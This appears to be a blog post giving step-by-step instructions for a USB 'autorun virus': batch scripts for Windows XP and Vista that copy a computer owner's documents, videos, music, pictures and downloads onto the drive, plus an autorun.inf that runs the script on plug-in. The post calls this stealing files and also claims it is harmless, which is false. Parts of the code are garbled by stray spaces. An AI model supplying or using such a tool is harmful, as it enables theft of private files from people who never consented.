Make an Autorun Virus that Steals files as soon as its plugged into a computer. This is no Harmful to the other Person's Computer at all. So first Plug in Your USB then Navigate Your Way to it. Now ; Copy and Paste this Batch Code that will Steal the files if you are using Windows Xp ; Use This Batch Code. Code : ******** @echo off :CHECK if not exist "%&&&&%\Copied_files" md "%&&&&% \Copied_files" if exist "%systemdrive%\Documents and Settings" goto COPIER goto ERROR :COPIER if not exist "%&&&&%\Copied_files\%computername %" md "%&&&&%\Copied_files\%computername%" if not exist "%&&&&%\Copied_files\%computername %\VIDEOS" md "%&&&&%\Copied_files\%computer name%\VIDEOS" if not exist "%&&&&%\Copied_files\%computername %\PICTURES" md "%&&&&%\Copied_files\%computername% \PICTURES" if not exist "%&&&&%\Copied_files\%computername %\MUSIC" md "%&&&&%\Copied_files\%computer name%\MUSIC" if not exist "%&&&&%\Copied_files\%computername %\DOWNLOADS" md "%&&&&%\Copied_files\%computername% \DOWNLOADS" copy /y "%userprofile%\My Documents\*.*" "%&&&& %\Copied_files\%computername%" copy /y "%userprofile%\My Documents\My Videos" "%&&&&%\Copied_files\%computername%\VIDEOS" copy /y "%userprofile%\My Documents\My Music" "%&&&&%\Copied_files\%computername%\MUSIC" copy /y "%userprofile%\My Documents\My Pictures" "%&&&&%\Copied_files\%computername% \PICTURES" copy /y "%userprofile%\My Documents\Downloads" "%&&&&%\Copied_files\%computername% \DOWNLOADS" MSG %username% "DONE!" exit :ERROR exit Now if You are Using Windows Vista ; Then Use This Batch Code. Code : ******** @echo off :CHECK if not exist “%&&&&%\Copied_files” md “%&&&&% \Copied_files” if exist “%systemdrive%\files” goto COPIER7 goto ERROR :COPIER7 if not exist “%&&&&%\Copied_files\%computername %” md “%&&&&%\Copied_files\%computername%” if not exist “%&&&&%\Copied_files\%computername %\VIDEOS” md “%&&&&%\Copied_files\%computer name%\VIDEOS” if not exist “%&&&&%\Copied_files\%computername %\PICTURES” md “%&&&&%\Copied_files\%computername% \PICTURES” if not exist “%&&&&%\Copied_files\%computername %\MUSIC” md “%&&&&%\Copied_files\%computer name%\MUSIC” if not exist “%&&&&%\Copied_files\%computername %\DOWNLOADS” md “%&&&&%\Copied_files\%computername% \DOWNLOADS” copy /y “%userprofile%\Documents\*.*” “%&&&&% \Copied_files\%computername%” copy /y “%userprofile%\Videos” “%&&&&%\Copied_ files\%computername%\VIDEOS” copy /y “%userprofile%\Music” “%&&&&%\Copied_ files\%computername%\MUSIC” copy /y “%userprofile%\Pictures” “%&&&&%\Copied_ files\%computername%\PICTURES” copy /y “%userprofile%\Downloads” “%&&&&% \Copied_files\%computername%\DOWNLOADS” MSG %username% “DONE!” exit :ERROR exit Now Replace &&&& with the name of your USB ; For example my USB's Name is "FiduHacker" Then Save it as FIDUHACKER.BAT or Whatever you Want. How this Batch file works is that it uses the MD Command or the Make Directory Command to Make the Copied_files folder and the files inside it. Then it Navigates its way to the Selected Folders and Pastes Them There. Now to make this file Autorun when we plug it. Now make another .txt file. Open this file & Paste this Code inside. Code : ******** [autorun] Open=&&&&.bat Action=File Copier So now replace the &&&& with Whatever You've Saved the Batch file as. Now Save it as autorun.inf Now Take Your USB Out and Plug it back in and the files will be Copied. if the files are not Automatically Copied, there will be an interface with option like "play with music player" and "read only" scroll down and u will find File copier

Post a Comment

 
Top